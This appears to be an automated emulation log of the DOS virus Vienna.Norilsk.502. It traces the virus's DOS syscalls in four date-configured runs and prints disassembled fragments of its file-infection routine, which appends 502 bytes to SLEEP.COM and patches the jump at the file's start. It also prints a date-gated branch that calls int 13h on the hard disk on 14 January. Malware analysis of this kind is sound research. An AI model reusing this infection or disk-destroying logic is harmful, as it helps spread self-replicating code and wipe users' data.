
vx.netlux.org/Virus.DOS.Vienna.Norilsk.502



Syscalls (the table appears to list only DOS int 21h functions; note that the `int 0x13` at 0x12c1c in the date-gated branch — taken only when the Get-date result has month 1 and day 14 — is not shown in this table even for the run configured with Day 14 / Month 1, so its absence below does not by itself prove the branch was skipped):

Time | Syscall (function number, decimal) | Op (PC at the call site) | Syscall Name
2018-12-17T22:32:39.351793961Z 42 PC: 12c09 | Get date
0x12c09: cmp dh, 1
0x12c0c: jne 0x12c1e
0x12c0e: cmp dl, 0xe
0x12c11: jne 0x12c1e
0x12c13: mov ax, 0x702
0x12c16: mov cx, 0x300
0x12c19: mov dx, 0x80
0x12c1c: int 0x13
0x12c1e: ret
0x12c1f: cmp al, byte ptr [bx + si]
0x12c21: push cx
0x12c22: fadd dword ptr [bx + si]
0x12c26: or al, 0x20
0x12c28: add byte ptr [bx + 0x76], dl
0x12c2b: je 0x12c4b
0x12c2d: pop dx
0x12c2e: jns 0x12c92
0x12c30: js 0x12be7
0x12c33: add word ptr [bx + si + 0xae9], si
0x12c37: add byte ptr [bp + si], ch
2018-12-17T22:32:39.354802352Z 48 PC: 12a82 | Get DOS version
2018-12-17T22:32:39.35649802Z 47 PC: 12a8e | Get disk transfer address
2018-12-17T22:32:39.357875033Z 26 PC: 12a9b | Set disk transfer address
2018-12-17T22:32:39.359681298Z 78 PC: 12b0e | Find first file
2018-12-17T22:32:39.36712315Z 67 PC: 12b45 | Get or set file attributes
2018-12-17T22:32:39.373472766Z 67 PC: 12b53 | Get or set file attributes
2018-12-17T22:32:39.716767897Z 61 PC: 12b5e | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:39.724702987Z 87 PC: 12b6a | Get or set file date and time
2018-12-17T22:32:39.726812281Z 44 PC: 12b74 | Get time
0x12b74: mov ah, 0x3f
0x12b76: mov cx, 3
0x12b79: lea dx, word ptr [si + 0x13]
0x12b7c: int 0x21
0x12b7e: jb 0x12bc7
0x12b80: cmp ax, 3
0x12b83: jne 0x12bc7
0x12b85: mov ax, 0x4202
0x12b88: xor cx, cx
0x12b8a: xor dx, dx
0x12b8c: int 0x21
0x12b8e: jb 0x12bc7
0x12b90: mov cx, ax
0x12b92: sub ax, 3
0x12b95: mov word ptr [si + 0x17], ax
0x12b98: add cx, 0x2d2
0x12b9c: mov word ptr [si - 0x1d1], cx
0x12ba0: mov ah, 0x40
0x12ba2: mov cx, 0x1f6
0x12ba5: nop
2018-12-17T22:32:39.729676554Z 63 PC: 12b7e | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:32:39.73778179Z 66 PC: 12b8e | Move file pointer
2018-12-17T22:32:39.7394588Z 64 PC: 12bac | Write file or device (Write 502 bytes on handle 5)
2018-12-17T22:32:39.749116502Z 66 PC: 12bbb | Move file pointer
2018-12-17T22:32:39.751030588Z 64 PC: 12bc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:32:39.758077768Z 87 PC: 12bd8 | Get or set file date and time
2018-12-17T22:32:39.75965638Z 62 PC: 12bdc | Close file
2018-12-17T22:32:39.766302499Z 67 PC: 12be7 | Get or set file attributes
2018-12-17T22:32:39.774059165Z 26 PC: 12bf2 | Set disk transfer address
2018-12-17T22:32:39.775924652Z 76 PC: 12a4d | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5835,"SideJobID":0}



Syscalls:

Time | Syscall (function number, decimal) | Op (PC at the call site) | Syscall Name
2018-12-25T11:55:31.612261126Z 42 PC: 12c09 | Get date
0x12c09: cmp dh, 1
0x12c0c: jne 0x12c1e
0x12c0e: cmp dl, 0xe
0x12c11: jne 0x12c1e
0x12c13: mov ax, 0x702
0x12c16: mov cx, 0x300
0x12c19: mov dx, 0x80
0x12c1c: int 0x13
0x12c1e: ret
0x12c1f: cmp al, byte ptr [bx + si]
0x12c21: push cx
0x12c22: fadd dword ptr [bx + si]
0x12c26: or al, 0x20
0x12c28: add byte ptr [bx + 0x76], dl
0x12c2b: je 0x12c4b
0x12c2d: pop dx
0x12c2e: jns 0x12c92
0x12c30: js 0x12be7
0x12c33: add word ptr [bx + si + 0xae9], si
0x12c37: add byte ptr [bp + si], ch
2018-12-25T11:55:31.61415439Z 48 PC: 12a82 | Get DOS version
2018-12-25T11:55:31.615074034Z 47 PC: 12a8e | Get disk transfer address
2018-12-25T11:55:31.616010761Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:55:31.617844783Z 78 PC: 12b0e | Find first file
2018-12-25T11:55:31.623713065Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T11:55:31.62915011Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T11:55:31.653748012Z 61 PC: 12b5e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:31.666063613Z 87 PC: 12b6a | Get or set file date and time
2018-12-25T11:55:31.667374844Z 44 PC: 12b74 | Get time
0x12b74: mov ah, 0x3f
0x12b76: mov cx, 3
0x12b79: lea dx, word ptr [si + 0x13]
0x12b7c: int 0x21
0x12b7e: jb 0x12bc7
0x12b80: cmp ax, 3
0x12b83: jne 0x12bc7
0x12b85: mov ax, 0x4202
0x12b88: xor cx, cx
0x12b8a: xor dx, dx
0x12b8c: int 0x21
0x12b8e: jb 0x12bc7
0x12b90: mov cx, ax
0x12b92: sub ax, 3
0x12b95: mov word ptr [si + 0x17], ax
0x12b98: add cx, 0x2d2
0x12b9c: mov word ptr [si - 0x1d1], cx
0x12ba0: mov ah, 0x40
0x12ba2: mov cx, 0x1f6
0x12ba5: nop
2018-12-25T11:55:31.669801517Z 63 PC: 12b7e | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:55:31.676770029Z 66 PC: 12b8e | Move file pointer
2018-12-25T11:55:31.679072354Z 64 PC: 12bac | Write file or device (Write 502 bytes on handle 5)
2018-12-25T11:55:31.688288118Z 66 PC: 12bbb | Move file pointer
2018-12-25T11:55:31.689545367Z 64 PC: 12bc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:55:31.694693919Z 87 PC: 12bd8 | Get or set file date and time
2018-12-25T11:55:31.696352663Z 62 PC: 12bdc | Close file
2018-12-25T11:55:31.703778789Z 67 PC: 12be7 | Get or set file attributes
2018-12-25T11:55:31.716358777Z 26 PC: 12bf2 | Set disk transfer address
2018-12-25T11:55:31.718641821Z 76 PC: 12a4d | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":14,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5835,"SideJobID":0}



Syscalls:

Time | Syscall (function number, decimal) | Op (PC at the call site) | Syscall Name
2018-12-25T11:55:31.732532306Z 42 PC: 12c09 | Get date
0x12c09: cmp dh, 1
0x12c0c: jne 0x12c1e
0x12c0e: cmp dl, 0xe
0x12c11: jne 0x12c1e
0x12c13: mov ax, 0x702
0x12c16: mov cx, 0x300
0x12c19: mov dx, 0x80
0x12c1c: int 0x13
0x12c1e: ret
0x12c1f: cmp al, byte ptr [bx + si]
0x12c21: push cx
0x12c22: fadd dword ptr [bx + si]
0x12c26: or al, 0x20
0x12c28: add byte ptr [bx + 0x76], dl
0x12c2b: je 0x12c4b
0x12c2d: pop dx
0x12c2e: jns 0x12c92
0x12c30: js 0x12be7
0x12c33: add word ptr [bx + si + 0xae9], si
0x12c37: add byte ptr [bp + si], ch
2018-12-25T11:55:31.735353966Z 48 PC: 12a82 | Get DOS version
2018-12-25T11:55:31.736460242Z 47 PC: 12a8e | Get disk transfer address
2018-12-25T11:55:31.737621142Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:55:31.739760678Z 78 PC: 12b0e | Find first file
2018-12-25T11:55:31.745689365Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T11:55:31.751929479Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T11:55:31.766910911Z 61 PC: 12b5e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:31.773635827Z 87 PC: 12b6a | Get or set file date and time
2018-12-25T11:55:31.775180128Z 44 PC: 12b74 | Get time
0x12b74: mov ah, 0x3f
0x12b76: mov cx, 3
0x12b79: lea dx, word ptr [si + 0x13]
0x12b7c: int 0x21
0x12b7e: jb 0x12bc7
0x12b80: cmp ax, 3
0x12b83: jne 0x12bc7
0x12b85: mov ax, 0x4202
0x12b88: xor cx, cx
0x12b8a: xor dx, dx
0x12b8c: int 0x21
0x12b8e: jb 0x12bc7
0x12b90: mov cx, ax
0x12b92: sub ax, 3
0x12b95: mov word ptr [si + 0x17], ax
0x12b98: add cx, 0x2d2
0x12b9c: mov word ptr [si - 0x1d1], cx
0x12ba0: mov ah, 0x40
0x12ba2: mov cx, 0x1f6
0x12ba5: nop
2018-12-25T11:55:31.777056334Z 63 PC: 12b7e | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:55:31.783407625Z 66 PC: 12b8e | Move file pointer
2018-12-25T11:55:31.784604264Z 64 PC: 12bac | Write file or device (Write 502 bytes on handle 5)
2018-12-25T11:55:31.792037025Z 66 PC: 12bbb | Move file pointer
2018-12-25T11:55:31.793759595Z 64 PC: 12bc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:55:31.799896753Z 87 PC: 12bd8 | Get or set file date and time
2018-12-25T11:55:31.801455738Z 62 PC: 12bdc | Close file
2018-12-25T11:55:31.810392439Z 67 PC: 12be7 | Get or set file attributes
2018-12-25T11:55:31.820616314Z 26 PC: 12bf2 | Set disk transfer address
2018-12-25T11:55:31.821888073Z 76 PC: 12a4d | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5835,"SideJobID":0}



Syscalls:

Time | Syscall (function number, decimal) | Op (PC at the call site) | Syscall Name
2018-12-25T11:55:31.890520527Z 42 PC: 12c09 | Get date
0x12c09: cmp dh, 1
0x12c0c: jne 0x12c1e
0x12c0e: cmp dl, 0xe
0x12c11: jne 0x12c1e
0x12c13: mov ax, 0x702
0x12c16: mov cx, 0x300
0x12c19: mov dx, 0x80
0x12c1c: int 0x13
0x12c1e: ret
0x12c1f: cmp al, byte ptr [bx + si]
0x12c21: push cx
0x12c22: fadd dword ptr [bx + si]
0x12c26: or al, 0x20
0x12c28: add byte ptr [bx + 0x76], dl
0x12c2b: je 0x12c4b
0x12c2d: pop dx
0x12c2e: jns 0x12c92
0x12c30: js 0x12be7
0x12c33: add word ptr [bx + si + 0xae9], si
0x12c37: add byte ptr [bp + si], ch
2018-12-25T11:55:31.893680353Z 48 PC: 12a82 | Get DOS version
2018-12-25T11:55:31.8954849Z 47 PC: 12a8e | Get disk transfer address
2018-12-25T11:55:31.896830753Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:55:31.898295567Z 78 PC: 12b0e | Find first file
2018-12-25T11:55:31.90720801Z 67 PC: 12b45 | Get or set file attributes
2018-12-25T11:55:31.913666468Z 67 PC: 12b53 | Get or set file attributes
2018-12-25T11:55:31.940634612Z 61 PC: 12b5e | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:31.948914786Z 87 PC: 12b6a | Get or set file date and time
2018-12-25T11:55:31.951443163Z 44 PC: 12b74 | Get time
0x12b74: mov ah, 0x3f
0x12b76: mov cx, 3
0x12b79: lea dx, word ptr [si + 0x13]
0x12b7c: int 0x21
0x12b7e: jb 0x12bc7
0x12b80: cmp ax, 3
0x12b83: jne 0x12bc7
0x12b85: mov ax, 0x4202
0x12b88: xor cx, cx
0x12b8a: xor dx, dx
0x12b8c: int 0x21
0x12b8e: jb 0x12bc7
0x12b90: mov cx, ax
0x12b92: sub ax, 3
0x12b95: mov word ptr [si + 0x17], ax
0x12b98: add cx, 0x2d2
0x12b9c: mov word ptr [si - 0x1d1], cx
0x12ba0: mov ah, 0x40
0x12ba2: mov cx, 0x1f6
0x12ba5: nop
2018-12-25T11:55:31.954198322Z 63 PC: 12b7e | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:55:31.962828013Z 66 PC: 12b8e | Move file pointer
2018-12-25T11:55:31.964488195Z 64 PC: 12bac | Write file or device (Write 502 bytes on handle 5)
2018-12-25T11:55:31.9739656Z 66 PC: 12bbb | Move file pointer
2018-12-25T11:55:31.982057258Z 64 PC: 12bc7 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:55:31.989939518Z 87 PC: 12bd8 | Get or set file date and time
2018-12-25T11:55:31.992091371Z 62 PC: 12bdc | Close file
2018-12-25T11:55:32.001251533Z 67 PC: 12be7 | Get or set file attributes
2018-12-25T11:55:32.012957653Z 26 PC: 12bf2 | Set disk transfer address
2018-12-25T11:55:32.025160838Z 76 PC: 12a4d | Terminate with return code (Return code = '0')